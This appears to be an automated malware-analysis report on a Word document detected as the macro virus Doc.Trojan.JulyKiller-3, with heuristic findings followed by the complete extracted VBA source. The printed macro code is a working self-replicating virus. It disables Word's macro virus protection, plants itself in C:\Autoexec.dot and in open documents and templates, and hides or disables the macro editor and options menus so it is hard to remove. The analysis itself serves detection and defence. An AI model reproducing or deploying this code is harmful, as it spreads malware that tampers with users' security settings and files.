MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are commonly used for malicious purposes. The script attempts to disable macro protection and copy itself into other documents and templates, indicating self-propagation or downloader behavior. The ClamAV detection 'Doc.Trojan.JulyKiller-3' further supports its malicious nature.
Heuristics (6)
- ClamAV: Doc.Trojan.JulyKiller-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.JulyKiller-3
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6751 bytes |

SHA-256 of macros.bas: 26b4ac813fc03ce95c72661e32898c7d6a4491499f1ae01579d9b56f6bd9e9bb

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Y2K"
Sub actNo()
End Sub
Sub Autos()
Dim file$
Dim ans$
Dim test
Dim mItem
Dim cItem
Dim aDoc
Dim aTemp
Dim vset
Dim Iset
Dim ad
Dim y2kDate As Long
Application.ScreenUpdating = False
For Each ad In AddIns
If ad.Name = "Autoexec.dot" Then
ad.Installed = False
End If
Next ad
With Dialogs(wdDialogToolsOptionsFileLocations)
.Path = "STARTUP-PATH"
.Setting = "c:\"
.Execute
End With
If Options.VirusProtection Then
Options.VirusProtection = False
End If
file$ = WordBasic.[MacroFileName$]()
If InStr(file$, "Autoexec") <> 0 Then
For Each aDoc In Documents
For Each cItem In aDoc.VBProject.VBComponents
If (cItem.Name = "Y2K") Then
vset = 1
End If
Next cItem
Next aDoc
For Each cItem In NormalTemplate.VBProject.VBComponents
If (cItem.Name = "Y2K") Then
vset = 1
End If
Next cItem
If vset <> 1 Then
WordBasic.DisableAutoMacros
Documents.Open FileName:="C:\Autoexec.dot", AddToRecentFiles:=False
For Each aDoc In Documents
If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aDoc.FullName + ":Y2K"
End If
Next aDoc
For Each aTemp In Templates
If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aTemp.FullName + ":Y2K"
End If
Next aTemp
ActiveDocument.Save
ActiveDocument.Close
End If
If vset = 1 Then
GoTo out
End If
End If
With Application.FileSearch
.LookIn = "C:\"
.FileName = "Autoexec.dot"
If .Execute > 0 Then
Iset = 1
End If
End With
If Iset <> 1 Then
WordBasic.DisableAutoMacros
Documents.Add NewTemplate:=True
WordBasic.MacroCopy file$ + ":Y2K", ActiveDocument.FullName + ":Y2K"
ActiveDocument.SaveAs FileName:="c:\Autoexec.dot", AddToRecentFiles:=False
ActiveDocument.Close
End If
For Each aDoc In Documents
If (file$ <> aDoc.FullName) And (aDoc.VBProject.Protection = 0) Then
For Each cItem In aDoc.VBProject.VBComponents
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
aDoc.VBProject.VBComponents.Remove (cItem)
End If
Next cItem
End If
Next aDoc
For Each aTemp In Templates
If (file$ <> aTemp.FullName) And (aTemp.VBProject.Protection = 0) Then
For Each cItem In aTemp.VBProject.VBComponents
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
aTemp.VBProject.VBComponents.Remove (cItem)
End If
Next cItem
End If
Next aTemp
For Each aDoc In Documents
If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
WordBasic.MacroCopy file$ + ":Y2K", aDoc.FullName + ":Y2K"
aDoc.Save
End If
Next aDoc
For Each aTemp In Templates
If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
WordBasic.MacroCopy file$ + ":Y2K", aTemp.FullName + ":Y2K"
End If
Next aTemp
out:
If InStr(file$, "Normal") = 0 Then
CustomizationContext = NormalTemplate
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF1))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF2))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
For Each mItem In CommandBars("Tools").Controls
If mItem.Caption = "自定义(&C)..." Then
mItem.OnAction = ""
End If
If mItem.Caption = "模板和加载项(&I)..." Then
mItem.OnAction = ""
End If
If mItem.Caption = "选项(&O)..." Then
mItem.OnAction = ""
End If
Next mItem
For Each mItem In CommandBars("File").Controls
If mItem.Caption = "新建(&N)..." Then
mItem.OnAction = "NewDoc"
End If
If mItem.Caption = "保存(&S)" Then
mItem.OnAction = "SaveDoc"
End If
Next mItem
For Each cItem In CommandBars("Tools").Controls
If cItem.Type = msoControlPopup Then
If cItem.Caption = "宏(&M)" Then
For Each mItem In cItem.CommandBar.Controls
If mItem.Caption = "宏(&M)..." Then
mItem.OnAction = ""
End If
If mItem.Caption = "Visual Basic 编辑器(&V)" Then
mItem.OnAction = ""
End If
Next mItem
End If
End If
Next cItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.OnAction = ""
Next cItem
For Each cItem In CommandBars("Standard").Controls
If cItem.Index = 1 Then
cItem.OnAction = "NewDoc"
End If
If cItem.Index = 3 Then
cItem.OnAction = "SaveDoc"
End If
Next cItem
For Each cItem In CommandBars
If cItem.Visible = True Then
cItem.Protection = msoBarNoCustomize
End If
Next cItem
End If
For Each myTask In Tasks
If InStr(myTask.Name, "Visual Basic") > 0 Then
myTask.Visible = False
End If
Next myTask
Application.ScreenUpdating = True
End Sub
Sub AutoOpen()
Autos
End Sub
Sub AutoClose()
Autos
End Sub
Sub AutoNew()
Autos
End Sub
Sub AutoExec()
Autos
End Sub
Sub NewDoc()
Documents.Add Template:="", NewTemplate:=False
Autos
End Sub
Sub SaveDoc()
ActiveDocument.Save
Autos
End Sub